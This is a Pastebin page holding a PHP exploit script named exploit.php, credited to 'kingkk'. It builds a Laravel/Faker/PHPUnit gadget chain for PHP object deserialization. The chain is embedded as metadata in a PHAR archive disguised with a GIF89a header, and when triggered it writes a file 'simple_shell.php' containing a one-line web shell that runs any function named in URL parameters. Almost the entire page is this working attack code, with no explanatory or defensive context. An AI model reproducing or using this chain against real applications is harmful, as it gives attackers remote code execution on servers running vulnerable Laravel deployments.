SHARE
TWEET

exploit.php

a guest Dec 26th, 2018 21 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. // Gadget 1
  4. namespace Illuminate\Broadcasting{
  5.     class PendingBroadcast{
  6.         protected $events;
  7.         protected $event;
  8.         public function __construct($events, $event)
  9.         {
  10.             $this->events = new \Faker\ValidGenerator();
  11.             $this->event = "tmp";
  12.         }
  13.  
  14.         public function __destruct()
  15.         {
  16.             $this->events->dispatch($this->event);
  17.         }
  18.     }
  19. }
  20.  
  21.  
  22. namespace Faker{
  23.     // Gadget 2
  24.     class ValidGenerator{
  25.         public function __construct($generator, $validator, $maxRetries = 10000)
  26.         {
  27.             $si = new \PHPUnit\Framework\MockObject\Invocation\StaticInvocation();
  28.             $g1 = new \Faker\Generator(array('tmp' => $si ));
  29.             $g2 = new \Faker\Generator(array("dispatch" => array($g1, "getFormatter")));
  30.             $rc = new \PHPUnit\Framework\MockObject\Stub\ReturnCallback();
  31.             $this->validator = array($rc, "invoke");
  32.             $this->generator = $g2;
  33.             $this->maxRetries = 10;
  34.         }
  35.  
  36.         public function __call($name, $arguments)
  37.         {
  38.             $i = 0;
  39.             do
  40.             {
  41.                 $res = call_user_func_array(array($this->generator, $name), $arguments);
  42.                 $i++;
  43.                 if ($i > $this->maxRetries)
  44.                 {
  45.                     break;
  46.                 }
  47.             } while (!call_user_func($this->validator, $res));
  48.             return $res;
  49.         }
  50.     }
  51.  
  52.     // Gadget 3
  53.     class Generator{
  54.         function __construct($form)
  55.         {
  56.             $this->formatters = $form;
  57.         }
  58.        
  59.         public function __call($method, $attributes)
  60.         {
  61.             return $this->format($method, $attributes);
  62.         }
  63.  
  64.         public function format($formatter, $arguments = array())
  65.         {
  66.             return call_user_func_array($this->getFormatter($formatter), $arguments);
  67.         }
  68.  
  69.    
  70.         public function getFormatter($formatter)
  71.         {
  72.             if (isset($this->formatters[$formatter]))
  73.             {
  74.                 return $this->formatters[$formatter];
  75.             }
  76.         }
  77.     }
  78.  
  79. }
  80.  
  81. // Gadget 4
  82. namespace PHPUnit\Framework\MockObject\Stub{
  83.     class ReturnCallback{
  84.         public function __construct($callback)
  85.         {
  86.             $this->callback = $callback;
  87.         }
  88.  
  89.         public function invoke(StaticInvocation $invocation)
  90.         {
  91.             return \call_user_func_array($this->callback, $invocation->getParameters());
  92.         }
  93.     }  
  94. }
  95.  
  96. // Gadget 5
  97. namespace PHPUnit\Framework\MockObject\Invocation{
  98.     class StaticInvocation{
  99.         function __construct()
  100.         {
  101.             $this->parameters = array('./simple_shell.php','<?php $_GET[0]($_GET[1]); ?>');
  102.         }
  103.  
  104.         public function getParameters(): array
  105.         {
  106.             return $this->parameters;
  107.         }
  108.     }
  109. }
  110.  
  111.  
  112. // Chaining all, exploit from kingkk
  113. namespace
  114. {
  115.      $exp = new Illuminate\Broadcasting\PendingBroadcast();
  116.      $p = new Phar('./k.phar', 0);
  117.      $p->startBuffering();
  118.      $p->setStub('GIF89a<?php __HALT_COMPILER(); ?>');
  119.      $p->setMetadata($exp);
  120.      $p->addFromString('1.txt','text');
  121.      $p->stopBuffering();
  122. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top